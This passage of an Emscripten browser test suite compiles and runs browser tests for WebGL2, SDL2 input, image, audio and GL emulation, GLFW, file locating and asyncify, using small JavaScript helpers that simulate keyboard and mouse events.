self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-sUSE_PTHREADS'])
@requires_graphics_hardware
def test_webgl2_objects(self):
self.btest_exit(test_file('webgl2_objects.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_html5_webgl_api(self):
for mode in [['-sOFFSCREENCANVAS_SUPPORT', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
['-sOFFSCREEN_FRAMEBUFFER', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest_exit(test_file('html5_webgl.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + mode)
@requires_graphics_hardware
def test_webgl2_ubos(self):
self.btest_exit(test_file('webgl2_ubos.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'])
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'))
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest_exit(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-sWEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'])
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# Tests that if we support both WebGL1 and WebGL2, and WebGL2RenderingContext exists
# but WebGL2 context creation fails at runtime, we can then manually create a
# WebGL1 context and succeed.
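# A sketch of the browser-level fallback idea being exercised (not the test's
# actual C source, which is not shown here; 'canvas' stands for any canvas element):
#
#   var ctx = canvas.getContext('webgl2')   // WebGL2 creation can fail at runtime...
#          || canvas.getContext('webgl');   // ...so fall back to a WebGL1 context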
self.btest_exit(test_file('test_webgl2_runtime_no_context.cpp'), args=['-sMAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest_exit(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-sMAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest_exit(test_file('webgl_with_closure.cpp'), args=['-O2', '-sMAX_WEBGL_VERSION=2', '--closure=1', '-lGL'])
# Tests that -sGL_ASSERTIONS and glVertexAttribPointer with packed types work together
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest_exit(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-sMAX_WEBGL_VERSION=2', '-sGL_ASSERTIONS'])
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest_exit(test_file('webgl2_pbo.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party/sokol/mipmap-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=Path('third_party/sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party/sokol/mrt-emcc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party/sokol/arraytex-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest_exit(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'])
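# The wget tests below pass -sASYNCIFY since synchronous wget-style calls block
# until the download completes.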
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget.c'), args=['-sASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget_data.c'), args=['-O2', '-g2', '-sASYNCIFY'])
@parameterized({
'': ([],),
'es6': (['-sEXPORT_ES6=1'],),
})
def test_locate_file(self, args):
self.set_setting('EXIT_RUNTIME')
for wasm in [0, 1]:
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
shutil.move('test.data', Path('sub/test.data'))
self.run_browser('page.html', None, '/report_result?exit:0')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-sSAFE_HEAP', '-sASSERTIONS', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
self.run_browser('page.html', None, '/report_result?exit:' + expected)
in_html('0')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
return result;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-sLEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-sUSE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# Load an image file and get its pixel data. Also gives -O2 coverage for --preload-file and memory-init.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-sUSE_SDL=2', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-sUSE_PTHREADS', '-sUSE_SDL=2', '-sPROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '--closure=1', '-g1', '-sLEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '-sLEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-sUSE_SDL=2', '-sUSE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-sUSE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-sUSE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-sUSE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-sUSE_SDL=2', '-sINITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-sUSE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-sGL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-sUSE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-sUSE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-sUSE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_glclipplane_gllighting(self):
self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.')
@requires_graphics_hardware
def test_sdl2_glalphatest(self):
self.btest('sdl2_glalphatest.c', reference='sdl2_glalphatest.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='GL_ALPHA_TEST emulation. You should see gradients with different alpha testing modes and reference values.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-sUSE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = read_file('test.html')
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-sGL_TESTING', '-sUSE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype/LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party/notofont/NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-sUSE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2'])
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2', '-sMAIN_MODULE'])
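# Compile sdl2_misc.c to an object file first and link it in a separate step,
# checking that -sUSE_SDL=2 works across separate compile and link invocations.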
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-sUSE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-sEXIT_RUNTIME', '-sUSE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-sUSE_SDL=2', '-sUSE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds/the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-sINITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
# TODO: need to source freepats.cfg and a midi file
# 'mod': (['mid'], 'MIX_INIT_MID', 'midi.mid'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-sUSE_SDL=2',
'-sUSE_SDL_MIXER=2',
'-sSDL2_MIXER_FORMATS=' + json.dumps(formats),
'-sINITIAL_MEMORY=33554432'
])
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(ports.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-sUSE_COCOS2D=3', '-sERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest_exit('browser/async.cpp', args=['-O' + str(opts), '-g2', '-sASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-sASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-sASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest_exit('browser/async.cpp', args=['-sASYNCIFY', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit defaults to 10 in Chrome, but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest_exit('browser/async_2.cpp', args=['-O3', '--pre-js', 'pre.js', '-sASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual.cpp', args=['-O' + str(opts), '-profiling', '-sASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual_2.cpp', args=['-O' + str(opts), '-sASSERTIONS', '-sSAFE_HEAP', '-profiling', '-sASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest_exit('browser/async_longjmp.cpp', args=args + ['-sASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_mainloop.cpp', args=['-O' + str(opts), '-sASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-sASSERTIONS', '-sDISABLE_EXCEPTION_CATCHING=0', '-profiling', '-sSAFE_HEAP', '-lSDL', '-sASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-sASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-sASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-sASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
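# A minimal sketch, not taken from browser/async_returnvalue.js (whose contents
# are not shown here), of how an asyncified JS library import is typically
# written; the name 'sketch_tunnel' is hypothetical, while mergeInto and
# Asyncify.handleSleep are the real library mechanisms such imports rely on:
#
#   mergeInto(LibraryManager.library, {
#     sketch_tunnel: function(value) {
#       // Pause the calling wasm, then resume it later with a return value.
#       return Asyncify.handleSleep(function(wakeUp) {
#         setTimeout(function() { wakeUp(value); }, 0);
#       });
#     }
#   });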
@parameterized({
'normal': (['-sASYNCIFY_IMPORTS=[sync_tunnel, sync_tunnel_bool]'],), # noqa
'response': (['-sASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-sASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', 'sync_tunnel\nsync_tunnel_bool\n')
self.btest('browser/async_returnvalue.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser/async_returnvalue.js')] + args + ['-sASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-sASYNCIFY', '-sASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
